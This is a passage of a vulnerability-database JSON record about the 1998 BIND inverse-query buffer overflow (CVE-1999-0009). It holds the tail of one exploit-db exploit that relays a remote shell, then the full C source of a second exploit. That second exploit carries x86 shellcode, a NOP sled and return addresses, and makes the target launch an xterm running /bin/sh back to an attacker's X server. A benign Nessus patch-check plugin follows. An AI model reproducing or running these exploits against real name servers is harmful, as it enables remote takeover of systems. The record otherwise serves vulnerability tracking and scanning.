int)\r\n (i=(opt?target[ti].opt_addr:target[ti].addr)));\r\n (void)printf(\"anbuff addr offset : %lu\\n\",offset);\r\n (void)printf(\"ret addr : 0x%x\\n\",(unsigned int)(i+offset));\r\n (void)printf(\"fd to make dups of : %d\\n\",target[ti].fd);\r\n\r\n (void)printf(\"here we go...\\n\");\r\n\r\n switch(attack(sock,target[ti],offset,opt))\r\n {\r\n case -1:\r\n (void)perror(\"error: attack\");\r\n exit(-1);\r\n break;\r\n\r\n case 0:\r\n (void)fprintf(stderr,\"error: internal error\\n\");\r\n exit(-1);\r\n break;\r\n }\r\n\r\n (void)printf(\"have fun.\\n\");\r\n (void)printf(\"-ROTShB\\n\");\r\n\r\n while(1)\r\n {\r\n FD_ZERO(&rd);\r\n if(ylen<(sizeof(ybuf)-1))\r\n FD_SET(sock,&rd);\r\n if(xlen<(sizeof(xbuf)-1))\r\n FD_SET(fileno(stdin),&rd);\r\n\r\n FD_ZERO(&wr);\r\n if(xlen)\r\n FD_SET(sock,&wr);\r\n if(ylen)\r\n FD_SET(fileno(stdout),&wr);\r\n\r\n if((ti=select((sock+1),&rd,&wr,NULL,NULL))==(-1))\r\n {\r\n (void)perror(\"error: select\");\r\n break;\r\n }\r\n\r\n if(FD_ISSET(fileno(stdin),&rd))\r\n {\r\n if((i=read(fileno(stdin),(xbuf+xlen),(sizeof(xbuf)-xlen)))==(-1))\r\n {\r\n (void)perror(\"error: read\");\r\n exit(-1);\r\n }\r\n else if(i==0)\r\n break;\r\n\r\n xlen += i;\r\n if(!(--ti)) continue;\r\n }\r\n\r\n\r\n if(FD_ISSET(sock,&wr))\r\n {\r\n if(write(sock,xbuf,xlen)!=xlen)\r\n {\r\n (void)perror(\"error: write\");\r\n exit(-1);\r\n }\r\n\r\n xlen = 0;\r\n if(!(--ti)) continue;\r\n }\r\n\r\n if(FD_ISSET(sock,&rd))\r\n {\r\n if((i=read(sock,(ybuf+ylen),(sizeof(ybuf)-ylen)))==(-1))\r\n {\r\n (void)perror(\"error: read\");\r\n exit(-1);\r\n }\r\n else if(i==0)\r\n break;\r\n\r\n ylen += i;\r\n if(!(--ti)) continue;\r\n }\r\n\r\n if(FD_ISSET(fileno(stdout),&wr))\r\n {\r\n if(write(fileno(stdout),ybuf,ylen)!=ylen)\r\n {\r\n (void)perror(\"error: write\");\r\n exit(-1);\r\n }\r\n\r\n ylen = 0;\r\n if(!(--ti)) continue;\r\n }\r\n }\r\n\r\n if(close(sock)==(-1))\r\n {\r\n (void)perror(\"error: close\");\r\n exit(-1);\r\n }\r\n\r\n exit(0);\r\n}", "cvss": 
{"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19111/"}, {"lastseen": "2016-02-02T11:06:44", "description": "BSDI BSD/OS 2.1,Caldera OpenLinux Standard 1.0,Data General DG/UX 5.4 4.11,IBM AIX 4.3,ISC BIND 8.1.1,NetBSD 1.3.1,RedHat Linux 5.0,SCO Open Desktop 3.0/Serv...", "published": "1998-04-08T00:00:00", "type": "exploitdb", "title": "Multiple OSes - BIND Buffer Overflow 2", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0009"], "modified": "1998-04-08T00:00:00", "id": "EDB-ID:19112", "href": "https://www.exploit-db.com/exploits/19112/", "sourceData": "source: http://www.securityfocus.com/bid/134/info\r\n \r\nA buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium (ISC). BIND fails to properly bound the data recieved when processing an inverse query. Upon a memory copy, portions of the program can be overwritten, and arbitrary commands run on the affected host.\r\n \r\nExploits for this vulnerability are very widespread, and were posted to the Bugtraq mailing list.\r\n\r\n/*\r\n * z, thnx.\r\n * ganked the xterm exec from adm, thnx.\r\n * have fun.\r\n * -prym\r\n */\r\n\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <signal.h>\r\n#include <time.h>\r\n#include <string.h>\r\n#include <ctype.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <arpa/nameser.h>\r\n#include <netdb.h>\r\n\r\n#define REMOTE\r\n#define DEFAULT_ANBUF_OFFSET 300\r\n#define DEFAULT_TARGET 0\r\n#define DEFAULT_OPTIMIZED 0\r\n#define DLEN_VAL 4\r\n#define PRE_OF_DATALEN (1+(sizeof(short)*3)+sizeof(long))\r\n#define ALEN_VAL (DLEN_VAL+PRE_OF_DATALEN)\r\n#define EVILSPACE (PACKETSZ-PRE_OF_DATALEN)\r\n#define RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+(sizeof(int)*6)+4-PRE_OF_DATALEN)\r\n#define OPT_RET_FROM_1NOP 
(PACKETSZ+(MAXDNAME+3)+4-PRE_OF_DATALEN)\r\n\r\nstruct target_type\r\n{\r\n char desc[40];\r\n int systype;\r\n unsigned long addr;\r\n unsigned long opt_addr;\r\n};\r\n\r\nstruct target_type target[] =\r\n{\r\n {\"x86 Linux 2.0.x named 4.9.5-P1\",0,0xbfffef8c,0xbfffefb4},\r\n {\"x86 Linux 2.0.x named 4.9.6-REL\",0,0xbffff188,0xbffff194},\r\n {\"x86 Linux 2.0.x named 8.1-REL\",0,0xbffff3f0,0xbffff44c},\r\n {\"x86 Linux 2.0.x named 8.1.1\",0,0xbffff404,0xbffff45c},\r\n {\"x86 Linux 2.0.x RH 4.2 named 4.9.5-P1\",0,0,0xbfffeff8},\r\n {{0},0,0,0}\r\n};\r\n\r\nunsigned long resolve(char *host)\r\n{\r\n long i;\r\n struct hostent *he;\r\n\r\n if((i=inet_addr(host))<0)\r\n if((he=gethostbyname(host))==NULL)\r\n return(0);\r\n else\r\n return(*(unsigned long *)he->h_addr);\r\n\r\n return(i);\r\n}\r\n\r\nint send_packet(int fd, char *buff, int len)\r\n{\r\n char tmp[2], *ptr=tmp;\r\n\r\n PUTSHORT(len,ptr);\r\n if(write(fd,tmp,2)!=2)\r\n return(-1);\r\n\r\n if(write(fd,buff,len)!=len)\r\n return(-1);\r\n\r\n return(1);\r\n}\r\n\r\nint attack(int fd, struct in_addr us, struct target_type t,\r\n\t unsigned long offset, int optimized)\r\n{\r\n char buff[sizeof(HEADER)+PRE_OF_DATALEN+RET_FROM_1NOP+4], *ptr=buff;\r\n HEADER *dnsh=(HEADER *)buff;\r\n unsigned long i;\r\n int dlen, len=0, al=ALEN_VAL, dl=DLEN_VAL;\r\n\r\n memset(dnsh,0,sizeof(HEADER));\r\n dnsh->id = htons(31337);\r\n dnsh->opcode = IQUERY;\r\n dnsh->rd = 1;\r\n dnsh->ra = 1;\r\n dnsh->ancount = htons(1);\r\n ptr += sizeof(HEADER);\r\n len += sizeof(HEADER);\r\n\r\n *ptr = '\\0';\r\n ptr++;\r\n PUTSHORT(T_A,ptr);\r\n PUTSHORT(C_IN,ptr);\r\n PUTLONG(31337,ptr);\r\n dlen = (optimized?OPT_RET_FROM_1NOP:RET_FROM_1NOP)+4;\r\n PUTSHORT(dlen,ptr);\r\n len += PRE_OF_DATALEN;\r\n\r\n memset(ptr,'X',(sizeof(buff)-(ptr-buff)));\r\n\r\n if(t.systype==0)\r\n {\r\n#ifdef REMOTE\r\n char c1[] 
=\r\n\t\"\\xeb\\x2f\\x5f\\xeb\\x4a\\x5e\\x89\\xfb\\x89\\x3e\\x89\\xf2\\xb0\\xfe\\xae\\x74\"\r\n\t\"\\x14\\x46\\x46\\x46\\x46\\x4f\\x31\\xc9\\x49\\xb0\\xff\\xf2\\xae\\x30\\xc0\\x4f\"\r\n\t\"\\xaa\\x89\\x3e\\xeb\\xe7\\x31\\xc0\\x89\\x06\\x89\\xd1\\x31\\xd2\\xb0\\x0b\\xcd\"\r\n\t\"\\x80\\xe8\\xcc\\xff\\xff\\xff\";\r\n char c2[] =\r\n\t\"/usr/bin/X11/xterm\\xff-display\\xff\";\r\n char c3[32];\r\n char c4[] =\r\n\t\"\\xfe\\xe8\\xb1\\xff\\xff\\xff\";\r\n\r\n snprintf(c3,sizeof(c3),\"%s:0\\xff-e\\xff/bin/sh\\xff\",inet_ntoa(us));\r\n\r\n c1[4] = (unsigned char)0x32+strlen(c2)+strlen(c3);\r\n c4[2] = (unsigned char)0xc9-strlen(c2)-strlen(c3);\r\n\r\n i = EVILSPACE-strlen(c1)-strlen(c2)-strlen(c3)-strlen(c4);\r\n\r\n memset(ptr,0x90,i);\r\n memcpy((ptr+i),c1,strlen(c1));\r\n memcpy((ptr+i+strlen(c1)),c2,strlen(c2));\r\n memcpy((ptr+i+strlen(c1)+strlen(c2)),c3,strlen(c3));\r\n memcpy((ptr+i+strlen(c1)+strlen(c2)+strlen(c3)),c4,strlen(c4));\r\n#else\r\n char c0de[] =\r\n \"\\xeb\\x24\\x5e\\x8d\\x1e\\x89\\x5e\\x0b\\x33\\xd2\\x89\\x56\\x07\\x89\\x56\\x0f\"\r\n \"\\xb8\\x1b\\x56\\x34\\x12\\x35\\x10\\x56\\x34\\x12\\x8d\\x4e\\x0b\\x8b\\xd1\\xcd\"\r\n \"\\x80\\x33\\xc0\\x40\\xcd\\x80\\xe8\\xd7\\xff\\xff\\xff/tmp/hi\";\r\n int i = EVILSPACE-strlen(c0de);\r\n\r\n memset(ptr,0x90,i);\r\n memcpy((ptr+i),c0de,strlen(c0de));\r\n#endif\r\n }\r\n else\r\n return(0);\r\n\r\n if(!optimized)\r\n {\r\n memcpy((ptr+(dlen-16)),&al,sizeof(al));\r\n memcpy((ptr+(dlen-12)),&dl,sizeof(dl));\r\n }\r\n\r\n i = (optimized?t.opt_addr:t.addr)+offset;\r\n memcpy((ptr+(dlen-4)),&i,sizeof(i));\r\n len += dlen;\r\n\r\n return(send_packet(fd,buff,len));\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n unsigned long offset=DEFAULT_ANBUF_OFFSET;\r\n int target_index=DEFAULT_TARGET, optimized=DEFAULT_OPTIMIZED, sock, i;\r\n struct sockaddr_in sa;\r\n struct in_addr xs;\r\n\r\n for(i=0;target[i].desc[0];i++);\r\n\r\n if(argc<3)\r\n {\r\n fprintf(stderr,\"\\ntarget types:\\n\");\r\n fprintf(stderr,\" %-2s : 
%-12s - %-12s - %s\\n\",\"tt\",\"anbuf\",\"opt anbuf\",\r\n\t \"description\");\r\n for(target_index=0;target_index<i;target_index++)\r\n\tfprintf(stderr,\" %-2d : 0x%-10x - 0x%-10x - %s\\n\",target_index,\r\n\t\t(unsigned int)target[target_index].addr,\r\n\t\t(unsigned int)target[target_index].opt_addr,\r\n\t\ttarget[target_index].desc);\r\n fprintf(stderr,\r\n\t \"\\nerror: usage: %s <target> <X server> [tt] [opt] [offset]\\n\",\r\n\t argv[0]);\r\n exit(-1);\r\n }\r\n\r\n if((argc>3)&&((target_index=atoi(argv[3]))>=i))\r\n {\r\n fprintf(stderr,\"error: invalid target type %d\\n\",target_index);\r\n exit(-1);\r\n }\r\n\r\n if((target[target_index].addr==0)&&(target[target_index].opt_addr==0))\r\n {\r\n fprintf(stderr,\"error: internal error\\n\");\r\n exit(-1);\r\n }\r\n\r\n if(argc>4)\r\n {\r\n optimized = atoi(argv[4]);\r\n if((optimized!=0)&&(optimized!=1))\r\n\t{\r\n\t fprintf(stderr,\"error: invalid optimization setting %d\\n\",optimized);\r\n\t exit(-1);\r\n\t}\r\n }\r\n\r\n if((optimized==0)&&(target[target_index].addr==0))\r\n optimized = 1;\r\n\r\n if((optimized==1)&&(target[target_index].opt_addr==0))\r\n optimized = 0;\r\n\r\n if(argc>5)\r\n offset = atoi(argv[5]);\r\n\r\n if(!(xs.s_addr=resolve(argv[2])))\r\n {\r\n fprintf(stderr,\"error: can not resolve: %s\\n\",argv[2]);\r\n exit(-1);\r\n }\r\n\r\n if(!(sa.sin_addr.s_addr=resolve(argv[1])))\r\n {\r\n fprintf(stderr,\"error: can not resolve: %s\\n\",argv[1]);\r\n exit(-1);\r\n }\r\n\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(53);\r\n\r\n if((sock=socket(sa.sin_family,SOCK_STREAM,IPPROTO_TCP))==(-1))\r\n {\r\n perror(\"error: socket\");\r\n exit(-1);\r\n }\r\n\r\n if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))\r\n {\r\n perror(\"error: connect\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"target : %s\\n\",inet_ntoa(sa.sin_addr));\r\n printf(\"target type : %s\\n\",target[target_index].desc);\r\n printf(\"optimized named : %s\\n\",(optimized?\"YES\":\"NO\"));\r\n printf(\"anbuff addr : 
0x%x\\n\",(unsigned int)\r\n\t (optimized?target[target_index].opt_addr:target[target_index].addr));\r\n printf(\"anbuff addr offset : %lu\\n\",offset);\r\n printf(\"xterm display dest : %s:0\\n\",inet_ntoa(xs));\r\n printf(\"exploiting . . .\\n\");\r\n\r\n switch(attack(sock,xs,target[target_index],offset,optimized))\r\n {\r\n case -1:\r\n perror(\"error: attack\");\r\n return(-1);\r\n break;\r\n\r\n case 0:\r\n fprintf(stderr,\"error: internal error\\n\");\r\n return(-1);\r\n break;\r\n }\r\n\r\n if(close(sock)!=0)\r\n {\r\n perror(\"error: close\");\r\n return(-1);\r\n }\r\n\r\n exit(0);\r\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19112/"}], "nessus": [{"lastseen": "2021-01-12T11:32:04", "description": "s700_800 11.00 Bind 4.9.7 components : \n\nSecurity vulnerability in the BIND executable.", "edition": 21, "published": "2005-02-16T00:00:00", "title": "HP-UX PHNE_12957 : s700_800 11.00 Bind 4.9.7 components", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0011", "CVE-1999-0010", "CVE-1999-0009"], "modified": "2005-02-16T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_12957.NASL", "href": "https://www.tenable.com/plugins/nessus/16871", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_12957. 
The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(16871);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-1999-0009\", \"CVE-1999-0010\", \"CVE-1999-0011\");\n script_xref(name:\"HP\", value:\"HPSBUX9808-083\");\n\n script_name(english:\"HP-UX PHNE_12957 : s700_800 11.00 Bind 4.9.7 components\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.00 Bind 4.9.7 components : \n\nSecurity vulnerability in the BIND executable.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_12957 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"1998/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) 
audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00\"))\n{\n exit(0, \"The host is not affected since PHNE_12957 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_12957\", \"PHNE_14618\", \"PHNE_20619\", \"PHNE_23274\", \"PHNE_28449\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"InternetSrvcs.INET-ENG-A-MAN\", version:\"B.11.00\")) flag++;\nif (hpux_check_patch(app:\"InternetSrvcs.INETSVCS-RUN\", version:\"B.11.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}